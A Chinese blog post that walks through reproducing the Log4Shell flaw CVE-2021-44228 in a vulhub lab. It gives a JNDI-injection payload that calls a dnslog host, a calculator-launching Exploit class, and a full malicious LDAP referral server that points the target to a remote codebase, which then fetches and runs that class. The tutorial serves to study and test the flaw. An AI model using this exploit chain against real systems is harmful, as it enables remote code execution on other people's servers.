复现log4j2-CVE-2021-44228

原创 已于 2022-05-17 20:31:38 修改 · 513 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2022-05-17 20:28:27 首次发布
本文介绍了Apache Log4j2的安全漏洞CVE-2021-44228,该漏洞允许攻击者通过在日志记录中注入特定变量执行任意代码。文章详细说明了漏洞原理,通过一个通俗的解释帮助理解问题的本质。同时,作者提供了vulhub环境的搭建步骤,包括运行log4j容器、构造payload以及观察DNSlog的响应。接着,分析了漏洞利用过程,包括编译Exploit.java为class文件,并通过Python开启目录共享。最后,展示了如何利用ldap服务进行测试,成功调用了计算器,证实了漏洞的可行性。

漏洞原理:

官方表述是:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。

通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行。

vulhub环境搭建

运行log4j容器

访问

 payload:

http://192.168.8.139:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xyr4kk.dnslog.cn}

dnslog上刷新显示jdk版本

漏洞分析:

pom依赖:
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>com.unboundid</groupId>
            <artifactId>unboundid-ldapsdk</artifactId>
            <version>3.2.0</version>
        </dependency>
    </dependencies>

调用计算器代码:Exploit.java

import java.io.IOException;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

编译成class文件:javac Exploit.java

ps:这里使用Python3开启目录共享,命令: python3 -m http.server 4444

 ldap服务

启动一个ldap服务
LDAPRefServer.java
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;

public class LDAPRefServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    /**
     * class地址 用#Exploit代替Exploit.class
     */
    private static final String EXPLOIT_CLASS_URL = "http://192.168.8.102:4444/#Exploit";

    public static void main(String[] args) {
        int port = 7912;

        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(EXPLOIT_CLASS_URL)));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port);
            ds.startListening();

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }

        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            } catch (Exception e1) {
                e1.printStackTrace();
            }

        }

        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws LDAPException, MalformedURLException {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "Calc");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if (refPos > 0) {
                cbstring = cbstring.substring(0, refPos);
            }
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
            e.addAttribute("javaFactory", this.codebase.getRef());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

    }
}

 开启ldap

 测试log4j

Log4J.java
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;

public class Log4J {
    private static final Logger logger = LogManager.getLogger(Log4J.class);

    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:7912/test}");
    }
}

计算器成功调用

CVE-2021-44228log4j2漏洞复现
fainpo的博客
05-07 426
漏洞适用版本:2.0 <= Apache log4j2 <= 2.14.1。
log4j2漏洞复现 (CVE-2021-44228)
m0_59958467的博客
10-29 1087
log4j2漏洞复现 (CVE-2021-44228)
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 2万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 927
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞。log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
【漏洞复现log4j2 CVE-2021-44228
zg_111的博客
03-20 2709
【漏洞复现log4j2 CVE-2021-44228漏洞复现
vulhub log4j2 CVE-2021-44228漏洞复现
qq_65852138的博客
09-08 448
vulhub log4j2 CVE-2021-44228漏洞复现
【Vulfocus漏洞复现log4j2-cve-2021-44228
weixin_45632448的博客
04-13 4314
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:64936/ 访问靶场环境http://123.58.236.76:64936/ 点击??? burp抓包,DNSlog验证漏洞是否存在 构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400 payload=${jndi:ldap://7272sq.ceye.io} 对payload进行url编码(burp自带),再次进行请求,
Apache Log4j 2 ​远程代码执行漏洞 ( CVE-2021-44228 )​
itisauto2008的专栏
12-14 2705
Microsoft 继续分析2021 年 12 月 9 日披露的与 Apache Log4j(许多基于 Java 的应用程序中使用的日志记录工具)相关的远程代码执行漏洞( CVE-2021-44228 )​。该漏洞是一种远程代码执行漏洞,可以让未经身份验证的攻击者获得对目标系统的完全访问权限。当易受攻击的 Log4j 2 组件解析和处理特制字符串时,可以触发它。这可能通过任何用户提供的输入发生。 该漏洞编号为CVE-2021-44228,称为“Log4Shell”,影响使用 Log4j 2 版本 2.0.
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3641
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
[渗透测试笔记] 50.Log4j2漏洞复现(CVE-2021-44228)
H4ppyD0g的博客
03-17 3137
文章目录漏洞描述利用工具简单复现vulhub复现手动复现深入分析漏洞原理 漏洞描述 漏洞描述 Apache Log4j是Apache的一个开源项目,是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 Log4j2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此
Solr 使用 Log4j
08-30 281
原文出处:http://blog.chenlb.com/2010/08/solr-with-log4j.html Solr 默认是用 Jdk 的日志输出。还好 Solr 是使用 slf4j 日志库,可以方便换用其它日志输出。solr 使用 log4j 也不难。重新生成 solr.war 把 solr.war 解压,然后把 log4j.properties 放到 W...
Solr 支持log4j
weixin_33772645的博客
12-18 225
2019独角兽企业重金招聘Python工程师标准>>> ...
solr 添加 log4j
gezehao的专栏
01-15 824
公司使用solr进行搜索功能 ,需要用LOG4J向指定的server打ERROR级别log用来监控。 但是solr不是web业务工程   只能使用自带的log4j.properties去配置指定的logger格式等参数 所以只能去使用指定的命令行去指定例如   java -jar start.jar -Dlog4j.configuration=file:./resources
Solr4.4 自行配置log4j内容
艾欧里亚
08-06 282
          我们solr.war 装载后 在 webapps/下生成 solr的文件夹。           然后把 log4j.properties 放到 WEB-INF/classes 中。没有 classes 创建一个。                 备注:solr的LOG4J 文件在 \solr-4.4.0\example\resources 目录下  log4j.pr...
Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行
weixin_74985952的博客
10-10 430
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
log4j漏洞复现CVE-2017-5645
最新发布
12-27
### 复现log4j CVE-2017-5645漏洞 #### 靶机环境准备 为了复现该漏洞,需先准备好实验环境。这涉及到Docker及其组件的安装以及获取必要的资源文件。 在Linux环境中,通过一系列命令来完成docker及相关工具链的部署: ```bash apt-get update && \ apt-get install -y apt-transport-https ca-certificates && \ apt install docker.io && \ apt-get install python3-pip && \ pip3 install docker-compose && \ docker-compose -v ``` 接着克隆`vulhub`项目仓库到本地用于后续操作: ```bash git clone https://gitee.com/puier/vulhub.git ``` 上述过程确保了拥有一个能够运行容器化应用的基础平台,并获得了包含易受攻击应用程序镜像在内的资料库[^3]。 #### 进入特定漏洞场景路径 切换至已下载下来的`vulhub`项目的指定位置,即针对CVE-2017-5645设置好的测试案例所在之处: ```bash cd /home/hbesljx/vulhub/log4j/CVE-2017-5645 ``` 此步骤定位到了预设好存在安全缺陷的日志服务实例上,以便进一步开展验证工作[^1]。 #### 启动含有漏洞的服务 启动带有Log4j反序列化漏洞的服务端程序,通常借助于`docker-compose up`指令实现自动化部署流程。由于具体细节依赖于实际配置情况,在这里假设一切正常情况下只需简单执行如下命令即可开启目标服务: ```bash docker-compose up ``` 此时应该有一个正在监听网络连接并接受外部输入作为日志记录处理的对象等待着被利用[^2]。 #### 构造恶意负载触发漏洞 对于想要成功重现这一问题的研究人员来说,构建合适的载荷至关重要。考虑到CVE-2017-5645的特点——允许未经身份验证的数据包内嵌Java对象流的形式传送到服务器端解析,则可尝试发送特制的消息给定地址上的开放接口以期达到预期效果。然而具体的实施方法会依据个人研究方向有所不同,建议查阅更多关于JNDI注入技巧方面的参考资料深入理解整个攻击面。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值